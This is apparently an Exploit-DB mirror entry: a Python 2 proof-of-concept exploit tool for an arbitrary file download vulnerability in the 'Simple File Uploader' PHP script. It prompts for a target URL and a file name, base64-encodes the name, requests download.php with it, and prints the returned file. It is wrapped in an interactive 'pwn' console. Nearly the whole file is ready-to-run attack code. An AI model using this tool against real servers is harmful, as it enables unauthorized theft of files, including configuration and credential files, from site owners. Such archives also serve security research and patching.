exploit-db-mirror/exploits/php/webapps/41943.py

# Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team




POC

#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear')

BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"

def banner():
	print WHITE+""
	print "                                              ##          ## "
	print "                                                ##      ##    "
	print "                                              ############## "
	print "                                            ####  ######  #### "
	print "                                          ###################### "
	print "                                          ##  ##############  ##     "
	print "                                          ##  ##          ##  ## "
	print "                                                ####  ####"
	print ""

def details():
	print WHITE+"                              =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
	print ""

def core_commands():
	os.system('clear')
	print WHITE+'''Core Commands\n===============\n
Command\t\t\tDescription\n-------\t\t\t-----------\n
?\t\t\tHelp menu
quit\t\t\tExit the console
info\t\t\tDisplay information
download\t\t\tExploit Vulnerability

	'''

def about():
	os.system('clear')
	print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
Author\t\t\tDescription\n-------\t\t\t-----------\n
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
	'''

def download():
	other = 'a'
	while other != 'n':
			urltarget = str(raw_input(WHITE+'Target: '))
			filename =  str(raw_input(WHITE+'FileName: '))
			filename =  base64.b64encode(filename)
			print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
			final = urltarget+'download.php?id='+filename
			r = requests.get(final)
			print r.text
			other = str(raw_input(WHITE+'Test other file? y/n: '))
			if other == "n":
				print "Type quit to exit. Bye!"



banner()
details()

option='0'
while option != 0:
	option = (raw_input(RED+"pwn" + WHITE +" > "))
	if option == "quit":
		os.system('clear')
		option = 0
	elif option == "?":
		core_commands()
	elif option == "help":
		core_commands()
	elif option == "about":
		about()
	elif option == "download":
		download()
	elif option == "info":
		about()
	else:
		print "Not a valid option! Need help? Press ? to display core commands " +GREEN